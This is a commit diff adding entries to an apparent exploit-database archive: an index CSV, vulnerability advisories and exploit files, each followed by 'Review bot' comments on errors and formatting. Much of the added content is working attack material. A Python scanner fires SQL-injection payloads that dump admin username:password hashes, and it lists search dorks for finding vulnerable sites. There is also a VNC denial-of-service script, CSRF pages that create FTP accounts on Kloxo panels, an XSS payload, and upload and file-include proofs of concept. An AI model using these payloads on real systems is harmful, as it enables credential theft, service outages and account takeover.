Updated 04_04_2014

Offensive Security 2014-04-04 04:34:07 +00:00
parent ef978c474e
commit d39d09c4d0
15 changed files with 707 additions and 0 deletions


@ -29422,3 +29422,17 @@ id,file,description,date,author,platform,type,port
32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0
32659,platforms/hardware/webapps/32659.txt,"ICOMM 610 Wireless Modem - CSRF Vulnerability",2014-04-02,"Blessen Thomas",hardware,webapps,0
32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0
32661,platforms/windows/remote/32661.html,"Evans FTP 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0
32662,platforms/php/webapps/32662.py,"WebPhotoPro Multiple SQL Injection Vulnerabilities",2008-12-14,baltazar,php,webapps,0
32663,platforms/php/webapps/32663.txt,"Injader 2.1.1 SQL Injection and HTML Injection Vulnerabilities",2008-12-15,anonymous,php,webapps,0
32664,platforms/hardware/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,hardware,webapps,8080
32665,platforms/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - CSRF Vulnerability",2014-04-02,"Necmettin COSKUN",php,webapps,7778
32666,platforms/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - CSRF Vulnerability",2014-04-02,"Necmettin COSKUN",php,webapps,7778
32667,platforms/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",hardware,webapps,80
32669,platforms/php/webapps/32669.txt,"phpcksec 0.2 'phpcksec.php' Cross Site Scripting Vulnerability",2008-12-17,ahmadbady,php,webapps,0
32670,platforms/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",php,webapps,0
32671,platforms/php/webapps/32671.txt,"DO-CMS 3.0 'p' Parameter Multiple SQL Injection Vulnerabilities",2008-12-18,"crash over",php,webapps,0
32672,platforms/php/webapps/32672.txt,"EasySiteNetwork Jokes Complete Website 'joke.php' SQL Injection Vulnerability",2008-12-18,Ehsan_Hp200,php,webapps,0
32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0
32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0
32675,platforms/linux/dos/32675.py,"QEMU 0.9 and KVM 36/79 VNC Server Remote Denial of Service Vulnerability",2008-12-22,"Alfredo Ortega",linux,dos,0
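Review bot: the id sequence in this hunk skips 32668 (row 32667 is followed directly by 32669), so either an entry was dropped from the batch or the id was retired; the commit message should say which, otherwise the gap reads like a lost row. Row 32670 (Oracle Identity Manager 11g R2 SP1, Unvalidated Redirects) is also filed under `platforms/php/webapps/` with platform `php`, while the advisory it points to describes a `/identity/faces/firstlogin` page, which is not a PHP application; `multiple` or a Java-related platform would keep platform-based searches of the index reliable.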


@ -0,0 +1,228 @@
Document Title:
===============
iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1240
Release Date:
=============
2014-03-31
Vulnerability Laboratory ID (VL-ID):
====================================
1240
Common Vulnerability Scoring System:
====================================
7.8
Product & Service Introduction:
===============================
I forgot to bring the cable, can I download the original photos from iPhone to my computer now ? With this software, just select the photos
you want to download, enable build in http server, you are on your way to get the full size photos! Use it as your usb stick or mobile hard disk.
Copy files, share image with your friends. Copy your video, audio, text, pdf or office files on to it. Enjoy it on the road, share it with your friends.
Build in http server enables to exchange information with any computer has browser. Need local WiFi network or cellular network for using this application.
Suggest to download over WiFi network. Or enable computer-to-computer WiFi network on your computer, let iPhone or iPod to join your computer\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s own WiFi network.
(Copy of the Product Homepage: https://itunes.apple.com/us/app/ishare-your-moving-library/id309685106 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered multiple web vulnerabilities in the official iShare - Your moving libarary iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Shanghai KaiWei Network Technology
Product: iShare Your moving library - iOS Mobile Web Application 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject own files with malicious
`filename` value in the `Upload` POST method request to compromise the mobile web-application. The attack vector is on the application-side
of the wifi service and the request method to inject is POST. The local file/path include execution occcurs in the index file dir list of
the upload path. Attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to
execute different local malicious requests. The security risk of the local file include web vulnerability is estimated as high(+) with a
cvss (common vulnerability scoring system) count of 6.8(+)|(-)6.9.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Search/Select File > Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir List (http://localhost:8080)
1.2
An arbitrary file upload web vulnerability has been discovered in the official iShare - Your moving libarary iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the POST method request of the `Upload` module. Remote attackers are able to upload a php or js web-shells by
renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following
name and extension `test.jpg.html.php.asp.html.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg
file extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is estimated
as high with a cvss (common vulnerability scoring system) count of 7.1(+)|(-)7.2.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
Successful exploitation of the arbitrary file upload web vulnerability results in unauthorized file access and system compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index File Dir List (http://localhost:8080)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers without user interaction or privileged web-interface account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC:
<a href="/files/%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png" class="file"><%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png</a></td><td class='del'>
<form action='/files/%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png' method='post'><input name='_method' value='delete' type='hidden'/>
<input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a>
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------10586417925275
Content-Disposition: form-data; name="newfile"; filename="<./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png"
Content-Type: image/png
Reference(s):
http://localhost:8080/
1.2
The arbitrary file upload web vulnerability can be exploited by local attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the file upload web vulnerability follow the provided information and steps below to continue.
PoC:
http://localhost:8080/files/./test.jpg.html.php.asp.html[ARBITRARY FILE UPLOAD VULNERABILITY!]
--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------23444256163832
Content-Disposition: form-data; name="newfile"; filename="test.jpg.html.php.asp.html.jpg[ARBITRARY FILE UPLOAD VULNERABILITY!]"
Content-Type: image/jpeg
Reference(s):
http://localhost:8080/files/
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability via filename value is estimated as high(+).
1.2
The security risk of the remote arbitrary file upload web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
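Review bot: the dates and scores in this advisory contradict each other and should be reconciled before indexing: `Release Date` says 2014-03-31, the disclosure timeline says 2014-03-26, and the CSV row for 32664 says 2014-04-02; the header CVSS is 7.8 while sections 1.1 and 1.2 score 6.8 and 7.1. `Exploitation Technique` is given as `Remote`, yet both PoC paragraphs say the issues are exploited by "local attackers", and the PoC for 1.1 is only a fragment of the directory-listing HTML (closing `</td>`, `</iframe>` and `</a>` tags with no opening counterparts). The file was also committed in a lossy encoding (`Gr??e des Inhalts`, `Copyright ?`, and the run of backslashes before `'s own WiFi network` in the product description), and "libarary" is misspelled twice. No fix or mitigation section is present; for an embedded HTTP server that builds its index from uploaded filenames, the reviewer would expect at least a note that filenames must be normalised to a single safe basename and that the listing must HTML-escape them.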


@ -0,0 +1,2 @@
pdf
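Review bot: the only content of this two-line file is the literal word `pdf`, so it carries no advisory text. If it is the placeholder for row 32667 (NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation, listed in the CSV as `platforms/hardware/webapps/32667.pdf`), the index now points at an empty document; either commit the actual PDF as a binary or change the row to a `.txt` with the advisory content.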

57
platforms/linux/dos/32675.py Executable file

@ -0,0 +1,57 @@
source: http://www.securityfocus.com/bid/32910/info
QEMU and KVM are prone to a remote denial-of-service vulnerability that affects the included VNC server.
Attackers can exploit this issue to create a denial-of-service condition.
The following are vulnerable:
QEMU 0.9.1 and prior
KVM-79 and prior
##
## vnc remote DoS
##
import socket
import time
import struct
import sys
if len(sys.argv)<3:
print "Usage: %s host port" % sys.argv[0]
exit(0)
host = sys.argv[1] # "127.0.0.1" # debian 4
port = int(sys.argv[2]) # 5900
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# rec-send versions
srvversion = s.recv(100)
cliversion=srvversion
s.send(cliversion)
print "Server version: %s" % srvversion
#Security types
sec=s.recv(100)
print "Number of security types: %d" % ord(sec[0])
s.send(sec[1])
# Authentication result
auth=s.recv(100)
if auth=="\x00\x00\x00\x00":
print "Auth ok."
# Share desktop flag: no
s.send("\x00")
# Server framebuffer parameters:
framebuf=s.recv(100)
# Trigger the bug
s.send("\x02\x00\x00\x00\x00\xff"+struct.pack("<L",1)*5)
s.close()
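Review bot: the six lines before `import socket` (`source: ...` through `KVM-79 and prior`) are bare prose, not comments, so as committed this `.py` file fails with a SyntaxError on its first line; wrap the header in `#` comments or a module docstring, as the `##` block below it already does. Two smaller points: the usage branch calls `exit(0)` after printing an error, where a non-zero status is conventional, and every `s.recv(100)` assumes the whole RFB handshake message arrives in a single read, which is not guaranteed over TCP.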


@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/32909/info
GNU Classpath is prone to a weakness that may result in weaker cryptographic security because its psuedo-random number generator (PRNG) lacks entropy.
Attackers may leverage this issue to obtain sensitive information that can lead to further attacks.
Classpath 0.97.2 is vulnerable; other versions may also be affected.
import gnu.java.security.util.PRNG;
class PRNGTest {
public static void main(String args[])
{
long t = System.currentTimeMillis();
System.out.println("Time in ms is " + t);
PRNG prng = PRNG.getInstance();
byte buffer[] = new byte[40];
prng.nextBytes(buffer, 0, buffer.length);
for(int i = 0; i != buffer.length; ++i)
{
// There must be an easier way to do this (right?)
int intval = buffer[i];
if(intval <= 0)
intval += 256;
String s = Integer.toHexString(intval);
if(s.length() == 1)
s = "0" + s;
System.out.print(s);
}
System.out.println("");
}
};
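Review bot: the sign fix in the hex dump is off by one: `if(intval <= 0) intval += 256;` turns a zero byte into 256, which `Integer.toHexString` prints as `100`, so any 0x00 in the 40-byte output is rendered as three characters and the dump no longer lines up with the companion C++ program's output. The condition should be `intval < 0`, or simply `int intval = buffer[i] & 0xff;`. As with the other files in this commit, the prose lines above `import gnu.java.security.util.PRNG;` are not comments, so the file does not compile as committed.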


@ -0,0 +1,56 @@
source: http://www.securityfocus.com/bid/32909/info
GNU Classpath is prone to a weakness that may result in weaker cryptographic security because its psuedo-random number generator (PRNG) lacks entropy.
Attackers may leverage this issue to obtain sensitive information that can lead to further attacks.
Classpath 0.97.2 is vulnerable; other versions may also be affected.
#include <botan/init.h>
#include <botan/sha160.h>
#include <botan/loadstor.h>
using namespace Botan;
#include <cstdlib>
#include <ctime>
int main(int argc, char* argv[])
{
Botan::LibraryInitializer init;
// by default start with a guess of 1 minute ago
u64bit time_guess = (std::time(0) - 60);
time_guess *= 1000; // convert to ms
u32bit how_many = 60000; // 60 second range by default
if(argc >= 2)
how_many = std::atoi(argv[1]);
if(argc >= 3)
time_guess = std::atoi(argv[2]);
//printf("Starting from %lld up to %d\n", time_guess, how_many);
SHA_160 sha;
byte buf[8], hash[40];
for(u32bit i = 0; i != how_many; ++i)
{
Botan::store_be(time_guess, buf);
// First block
sha.update(buf, sizeof(buf));
sha.final(hash);
sha.update(buf, sizeof(buf));
sha.update(hash, 20); // previous output
sha.final(hash + 20);
/*
printf("seed=%lld hash=", time_guess);
for(u32bit j = 0; j != sizeof(hash); ++j)
printf("%02X", hash[j]);
printf("\n");
*/
++time_guess; // move to next ms
}
}
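Review bot: `time_guess = std::atoi(argv[2]);` stores an `int` into the `u64bit` millisecond timestamp, and `std::time(0) * 1000` is already far outside `int` range, so any starting seed passed on the command line is truncated; use `std::strtoull` (or `std::atoll`) here, and note that `how_many = std::atoi(argv[1])` converts a negative argument into a huge `u32bit` loop count. With both `printf` blocks commented out the loop computes SHA-1 chains and discards them, so the program as committed produces no observable result and never compares against the 40-byte output of the Java test it accompanies. The prose lines above `#include <botan/init.h>` also need to be commented for the file to compile.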

114
platforms/php/webapps/32662.py Executable file

@ -0,0 +1,114 @@
source: http://www.securityfocus.com/bid/32829/info
WebPhotoPro is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
import sys, os, re, time, urllib2
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
if len(sys.argv) !=2:
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 12/2008 WebPhotoPro exploit |"
print "| Help: webphotopro.py -h |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
for arg in sys.argv:
if arg == '-h' or arg == '--help' or arg == '-help':
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 12/2008 WebPhotoPro exploit |"
print "| Usage: webphotopro.py www.site.com |"
print "| Example: python webphotopro.py www.ere.gov.al |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
vulnsql = ["art.php?idm=1'+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12,13+from+editor/*", "rub.php?idr=1+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12+from+editor--","rub.php?idr=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6,7,8,9+from+editor--", "rub.php?idr=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6,7,8,9,10+from+editor--","galeri_info.php?ida=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6+from+editor/*", "galeri_info.php?ida=1+and+1=2+union+all+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+editor/*","rubrika.php?idr=1+and+1=2+union+all+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+editor--","rub.php?idr=176+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12+from+editor/*"]
site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site[-1] != "/":
site = site + "/"
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 12/2008 WebPhotoPro exploit |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print "\n[+] Target:",site
print "[+]",len(vulnsql),"Vulns loaded..."
print "[+] Starting Scan...\n"
for sql in vulnsql:
print "[+] Checking:" ,site+sql.replace("\n","")
print
try:
code = urllib2.urlopen(site+sql.replace("\n", "")).read()
hash = re.findall("[a-f0-9]"*32,code)
if len(hash) >=1:
print "[w00t!w00t!]" ,site+sql.replace("\n","")
print
print "Admin panel: ",site+"admini/"
print "Check for default login --> admin:demo"
print
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt):
pass
print
print
print
print "[!!!] For more target try next dorks: "
print
print '''\t inurl:/art.php?idm=
intext:"Powered by WebPhotoPro"
inurl:/rub.php?idr=
inurl:/galeri_info.php?lang=
inurl:/galeri_info.php?l=
inurl:/galeri_info.php?ida=
inurl:/tekst.php?idt=
inurl:/rubrika.php?idr=
intext:"Powered by WebPhotoPro" site:al'''
print
print "Check for more details: http://packetstormsecurity.org/0808-exploits/webphotopro-sql.txt"
print
print "\n[-] %s" % time.strftime("%X")
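Review bot: the `--help` text names `www.ere.gov.al`, a real third-party (government) domain, as the example target; example usage in archived advisories should use a reserved name such as `www.example.com`. In the scan loop, `except(KeyboardInterrupt): pass` swallows Ctrl-C inside each request so the run cannot be interrupted cleanly, and only `urllib2.HTTPError` is caught, so an unreachable host raises an uncaught `urllib2.URLError` traceback. The three `source:` and description lines sit above the `#!/usr/bin/python` shebang and are not comments, so the file does not parse as committed.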

11
platforms/php/webapps/32663.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/32843/info
Injader is prone to multiple HTML-injection vulnerabilities and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
The attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Injader 2.1.2 are vulnerable.
http://www.example.com/upload/feeds.php?name=articles&id=<SQL>

52
platforms/php/webapps/32665.txt Executable file

@ -0,0 +1,52 @@
# Exploit Title :Kloxo 6.1.18 Stable CSRF Vulnerability
# Vendor Homepage :http://lxcenter.org/software/kloxo
# Version :6.1.18
# Exploit Author :Necmettin COSKUN =>@babayarisi
# Blog :http://www.ncoskun.com http://www.grisapka.org
# Discovery date :03/12/2014
# CVE :N/A
Kloxo (formerly known as Lxadmin) is a free, opensource web hosting control panel for the Red Hat and CentOS Linux distributions.
================
CSRF Vulnerability
Vulnerability
================
Kloxo has lots of POST and GET based form applications some inputs escaped from specialchars but inputs dont have any csrf protection or secret key
So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.
Poc Exploit
================
<html>
<head><title>Kloxo demo</title></head>
<script type="text/javascript">
function yurudi(){
///////////////////////////////////////////////////////////
//Kloxo 6.1.18 Stable CSRF Vulnerability //
//Author:Necmettin COSKUN => twitter.com/@babayarisi //
//Blog: http://www.ncoskun.com | http://www.grisapka.org //
///////////////////////////////////////////////////////////
//Remote host
var host="victim.com";
//New Ftp Username
var username="demouser";
//New Ftp Password
var pass="12345678";
//This creates new folder under admin dir. /admin/yourfolder
var dir="demodirectory";
//If necessary only modify http to https ;)
var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
document.getElementById('demoexploit').src=urlson;
}
</script>
<body onload="yurudi();">
<img id="demoexploit" src=""></img>
</body>
</html>
Discovered by:
================
Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!
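Review bot: `Discovery date :03/12/2014` is ambiguous (3 December or 12 March) and the CSV row for 32665 uses 2014-04-02; an ISO date here would remove the doubt. The description says Kloxo's POST- and GET-based forms lack CSRF protection, but the PoC exercises only a GET request via an `<img>` source to `display.php?...&frm_action=add`, so the POST claim is not demonstrated. In the HTML, the `<script>` element sits between `</head>` and `<body>`, `</img>` is not a valid closing tag, and the URL contains a doubled slash (`:7778//display.php`). The advisory lists no remediation; the fix the author's own wording implies is a per-session secret token checked on every state-changing form, plus refusing state changes over GET.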

54
platforms/php/webapps/32666.txt Executable file

@ -0,0 +1,54 @@
# Exploit Title :Kloxo-MR 6.5.0 CSRF Vulnerability
# Vendor Homepage :https://github.com/mustafaramadhan/kloxo/tree/dev
# Version :Kloxo-MR 6.5.0.f-2014020301
# Tested on :Centos 6.4
# Exploit Author :Necmettin COSKUN =>@babayarisi
# Blog :http://www.ncoskun.com http://www.grisapka.org
# Discovery date :03/12/2014
# CVE :N/A
Kloxo-MR is special edition (fork) of Kloxo with many features not existing on Kloxo official release (6.1.12+).
This fork named as Kloxo-MR (meaning 'Kloxo fork by Mustafa Ramadhan').
================
CSRF Vulnerability
Vulnerability
================
Kloxo-MR has lots of POST and GET based form applications like Kloxo stable , some inputs escaped from specialchars but inputs dont have any csrf protection or secret key
So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.
Poc Exploit
================
<html>
<head><title>Kloxo-MR demo</title></head>
<script type="text/javascript">
function yurudi(){
///////////////////////////////////////////////////////////
//Kloxo-MR 6.5.0 CSRF Vulnerability //
//Author:Necmettin COSKUN => twitter.com/@babayarisi //
//Blog: http://www.ncoskun.com | http://www.grisapka.org //
///////////////////////////////////////////////////////////
//Remote host
var host="victim.com";
//New Ftp Username
var username="demouser";
//New Ftp Password
var pass="12345678";
//This creates new folder under admin dir. /admin/yourfolder
var dir="demodirectory";
//If necessary only modify http to https ;)
var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
document.getElementById('demoexploit').src=urlson;
}
</script>
<body onload="yurudi();">
<img id="demoexploit" src=""></img>
</body>
</html>
Discovered by:
================
Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!
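Review bot: apart from the title and comment lines, this PoC is byte-for-byte the one in 32665 (same `:7778//display.php` URL and parameters, same `yurudi()` function), so the advisory should either state that the Kloxo-MR 6.5.0.f-2014020301 build was re-tested with it (the header says `Tested on :Centos 6.4` but gives no result) or cross-reference 32665 rather than duplicating it. The same ambiguous `03/12/2014` discovery date and the missing remediation section apply here as in 32665.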

10
platforms/php/webapps/32669.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/32890/info
The 'phpcksec' script is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
This issue affects phpcksec 0.2.0; other versions may also be affected.
http://www.example.com/path/phpcksec.php?path=>\'><ScRiPt >alert(0);</ScRiPt>

45
platforms/php/webapps/32670.txt Executable file

@ -0,0 +1,45 @@
Unvalidated Redirects on Oracle Identity Manager
=======================================================================
[ADVISORY INFORMATION]
Title: Unvalidated Redirects on Oracle Identity Manager
Discovery date: 10/12/2013
Release date: 03/04/2014
Vendor Homepage: www.oracle.com
Version: Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0)
Credits: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
[VULNERABILITY INFORMATION]
Class: Unvalidated Redirects
Category: Web
AFFECTED PRODUCTS]
This security vulnerability affects:
* Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0)
[VULNERABILITY DETAILS]
Sending to a legitimate user the following request:
https://trusteddomainname/identity/faces/firstlogin?action=changepwd&backUrl=https://myevildomain/
it is possible, after the password change procedure, to redirect the user to a malicious domain.
Attacker links to unvalidated redirect and tricks victims into clicking it. Victims are more likely to click on it, since the link is to a valid site. So such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information.
[DISCLOSURE TIME-LINE]
* 10/12/2013 - Initial vendor contact.
* 11/12/2013 - Oracle confirmed the issue is a new security vulnerability.
* 03/04/2014 - Oracle hasn't fixed this vulnerability yet.
* 03/04/2014 - Public disclosure.
[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.
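Review bot: `AFFECTED PRODUCTS]` is missing its opening `[`, unlike the other section headers in this advisory. The timeline says Oracle confirmed the issue on 11/12/2013 and had not fixed it at public disclosure, but no workaround is offered; the reviewer would expect the advisory to name the defensive control that closes an open redirect of this shape, namely accepting only relative paths or an allow-list of trusted hosts for `backUrl` on the server side. Dates are in DD/MM/YYYY while the CSV row for 32670 uses 2014-04-03; one format should be used throughout.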


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32906/info
DO-CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DO-CMS 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?p=%28SQL%29


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32908/info
EasySiteNetwork Jokes Complete Website is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
